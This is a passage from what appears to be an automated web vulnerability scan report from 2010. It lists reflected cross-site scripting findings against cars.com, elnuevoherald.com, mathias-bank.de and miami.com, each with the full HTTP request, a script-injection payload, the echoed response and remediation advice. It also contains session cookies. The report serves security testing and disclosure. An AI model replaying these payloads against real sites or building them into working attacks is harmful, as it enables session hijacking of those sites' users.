Accept-Encoding: gzip, deflate
Host: www.cars.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=00006AQWaoFsyLddCkEpMZm_TPv:155ki6a91; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; affiliate=herald; cars_persist=3896579244.20480.0000; cars_persist=3863024812.20480.0000

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:19:18 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000fv2MuS4FrMJkgde0tylo8FS:155ki6a91; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; Expires=Sat, 14 Nov 2015 00:22:33 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Mon, 06 Dec 2010 00:22:33 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: Keep-Alive
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Mon, 15-Nov-2010 00:52:34 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 1378

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<body>

<iframe src="http://an.tacoda.net/an/slf.htm?siteid=11889&st=&make=&model=90
...[SNIP]...
<img src="http://ad.trafficmp.com/a/bpix?top=7-2674.1&make=&model=90b61"><script>alert(1)</script>d4b3fa8bb16&intent=&zip=" />
...[SNIP]...

2.215. http://www.cars.com/go/includes/targeting/vendors.jsp [my parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cars.com
Path:   /go/includes/targeting/vendors.jsp

Issue detail

The value of the my request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d0dd"><script>alert(1)</script>f402f124952 was submitted in the my parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /go/includes/targeting/vendors.jsp?makename=&modelname=&year=&my=2d0dd"><script>alert(1)</script>f402f124952 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.cars.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.cars.com
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=00006AQWaoFsyLddCkEpMZm_TPv:155ki6a91; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; affiliate=herald; cars_persist=3896579244.20480.0000; cars_persist=3863024812.20480.0000

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:19:40 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000h8XOtD9oWfwI1fAunHrlOmb:155hteb77; Path=/
Set-Cookie: Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=; Expires=Sat, 14 Nov 2015 00:23:20 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Mon, 06 Dec 2010 00:23:20 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: Keep-Alive
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Mon, 15-Nov-2010 00:53:20 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 1378

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<body>

<iframe src="http://an.tacoda.net/an/slf.htm?siteid=11889&st=2d0dd&#034;&gt;
...[SNIP]...
<img src="http://ad.trafficmp.com/a/bpix?top=7-2674.1&make=&model=&intent=2d0dd"><script>alert(1)</script>f402f124952&zip=" />
...[SNIP]...

2.216. http://www.elnuevoherald.com/reg-bin/int.cgi [version parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elnuevoherald.com
Path:   /reg-bin/int.cgi

Issue detail

The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f72c'%3balert(1)//6eca97bbb21 was submitted in the version parameter. This input was echoed as 9f72c';alert(1)//6eca97bbb21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reg-bin/int.cgi?mode=login&version=esp9f72c'%3balert(1)//6eca97bbb21 HTTP/1.1
Host: www.elnuevoherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Vary: Accept-Encoding
Mi-app-host: rdds008p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 14 Nov 2010 22:39:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:39:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77533

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>

<script
...[SNIP]...
<!--
measure_popularity=false;
mistats.msr = 'ELN|EN';

mistats.pagelevel='Other';
mistats.pagename='registration: ';
mistats.version='1.0|v-esp9f72c';alert(1)//6eca97bbb21';
mistats.taxonomy='notaxonomy||||';
mistats.channel='registration';
mistats.adposition='';


-->
...[SNIP]...

2.217. http://www.elnuevoherald.com/reg-bin/tint.cgi [version parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elnuevoherald.com
Path:   /reg-bin/tint.cgi

Issue detail

The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 765c4'%3balert(1)//a86bf71eac9 was submitted in the version parameter. This input was echoed as 765c4';alert(1)//a86bf71eac9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reg-bin/tint.cgi?mode=edit&version=newsletter765c4'%3balert(1)//a86bf71eac9 HTTP/1.1
Host: www.elnuevoherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds017p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 14 Nov 2010 22:39:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:39:36 GMT
Content-Length: 32389
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>

<script
...[SNIP]...
<!--
measure_popularity=false;
mistats.msr = 'ELN|EN';

mistats.pagelevel='Other';
mistats.pagename='registration: ';
mistats.version='1.0|v-newsletter765c4';alert(1)//a86bf71eac9';
mistats.taxonomy='notaxonomy||||';
mistats.channel='registration';
mistats.adposition='';


-->
...[SNIP]...

2.218. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mathias-bank.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91ba8"><script>alert(1)</script>9a5bd6d02c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91ba8\"><script>alert(1)</script>9a5bd6d02c1 in the application's response. The application inserts a backslash before the double quote, but a backslash has no escaping meaning inside an HTML attribute value: the quote still terminates the attribute, and the remainder of the payload is parsed as markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?91ba8"><script>alert(1)</script>9a5bd6d02c1=1 HTTP/1.1
Host: www.mathias-bank.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:40:39 GMT
Server: Apache/2.2.8 (Ubuntu)
X-Powered-By: PHP/5.2.4-2ubuntu5.12
X-Pingback: http://www.mathias-bank.de/xmlrpc.php
Set-Cookie: bb2_screener_=1289774439+174.121.222.18; path=/
Set-Cookie: PHPSESSID=0f3d95ccecf9bde143451862e81a94c4; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<a href="/?91ba8\"><script>alert(1)</script>9a5bd6d02c1=1/lang-pref/en/">
...[SNIP]...

2.219. http://www.miami.com/advanced-search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /advanced-search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b0f3"-alert(1)-"6571febded2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value should be emitted as a JavaScript string literal in which quotes, backslashes, line terminators and the characters <, > and & are hex- or Unicode-escaped, so that the enclosing quote cannot be closed and no </script> sequence can appear; HTML entity encoding is not interpreted inside a script block and is therefore not the appropriate encoding here.

Request

GET /advanced-search?6b0f3"-alert(1)-"6571febded2=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:44:20 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 112540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
{};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20401001";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|advanced-search?6b0f3"-alert(1)-"6571febded2=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.220. http://www.miami.com/deals [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /deals

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3581b"-alert(1)-"133c343be5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value should be emitted as a JavaScript string literal in which quotes, backslashes, line terminators and the characters <, > and & are hex- or Unicode-escaped, so that the enclosing quote cannot be closed and no </script> sequence can appear; HTML entity encoding is not interpreted inside a script block and is therefore not the appropriate encoding here.

Request

GET /deals?3581b"-alert(1)-"133c343be5e=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:44:21 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:23 GMT
Content-Length: 22144
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>

...[SNIP]...

miyahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20307001";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|deals?3581b"-alert(1)-"133c343be5e=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.221. http://www.miami.com/espanol [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /espanol

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2adf"-alert(1)-"b1a172c4bed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value should be emitted as a JavaScript string literal in which quotes, backslashes, line terminators and the characters <, > and & are hex- or Unicode-escaped, so that the enclosing quote cannot be closed and no </script> sequence can appear; HTML entity encoding is not interpreted inside a script block and is therefore not the appropriate encoding here.

Request

GET /espanol?f2adf"-alert(1)-"b1a172c4bed=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:42:47 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:42:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:42:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
iyahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20287501";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|espanol?f2adf"-alert(1)-"b1a172c4bed=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.222. http://www.miami.com/galleries [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /galleries

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d478"-alert(1)-"52928c4d4d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value should be emitted as a JavaScript string literal in which quotes, backslashes, line terminators and the characters <, > and & are hex- or Unicode-escaped, so that the enclosing quote cannot be closed and no </script> sequence can appear; HTML entity encoding is not interpreted inside a script block and is therefore not the appropriate encoding here.

Request

GET /galleries?9d478"-alert(1)-"52928c4d4d7=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:42:39 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:42:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:42:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
ahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20268001";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|galleries?9d478"-alert(1)-"52928c4d4d7=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.223. http://www.miami.com/gay [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /gay

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af6fa"-alert(1)-"6c3dea84605 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value should be emitted as a JavaScript string literal in which quotes, backslashes, line terminators and the characters <, > and & are hex- or Unicode-escaped, so that the enclosing quote cannot be closed and no </script> sequence can appear; HTML entity encoding is not interpreted inside a script block and is therefore not the appropriate encoding here.

Request

GET /gay?af6fa"-alert(1)-"6c3dea84605=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:43:26 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:43:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:43:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 72751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
'>
miyahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20442501";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|gay?af6fa"-alert(1)-"6c3dea84605=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.224. http://www.miami.com/hotels [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /hotels

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d989"-alert(1)-"1c56ab040ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value should be emitted as a JavaScript string literal in which quotes, backslashes, line terminators and the characters <, > and & are hex- or Unicode-escaped, so that the enclosing quote cannot be closed and no </script> sequence can appear; HTML entity encoding is not interpreted inside a script block and is therefore not the appropriate encoding here.

Request

GET /hotels?4d989"-alert(1)-"1c56ab040ce=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:43:59 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 95134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
miyahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20413501";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|hotels?4d989"-alert(1)-"1c56ab040ce=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.225. http://www.miami.com/movies [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /movies

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c6eb"-alert(1)-"029fda865f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value should be emitted as a JavaScript string literal in which quotes, backslashes, line terminators and the characters <, > and & are hex- or Unicode-escaped, so that the enclosing quote cannot be closed and no </script> sequence can appear; HTML entity encoding is not interpreted inside a script block and is therefore not the appropriate encoding here.

Request

GET /movies?6c6eb"-alert(1)-"029fda865f4=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:42:30 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:42:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:42:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
miyahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20264501";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|movies?6c6eb"-alert(1)-"029fda865f4=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.226. http://www.miami.com/movies/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /movies/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 892e0"-alert(1)-"96ce8fc124 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the value should be emitted as a JavaScript string literal in which quotes, backslashes, line terminators and the characters <, > and & are hex- or Unicode-escaped, so that the enclosing quote cannot be closed and no </script> sequence can appear; HTML entity encoding is not interpreted inside a script block and is therefore not the appropriate encoding here.

Request

GET /movies/?892e0"-alert(1)-"96ce8fc124=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:54:06 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:54:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:54:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
iyahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20264501";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|movies|?892e0"-alert(1)-"96ce8fc124=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.227. http://www.miami.com/nightlife [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /nightlife

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6577"-alert(1)-"5b0a69b1321 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

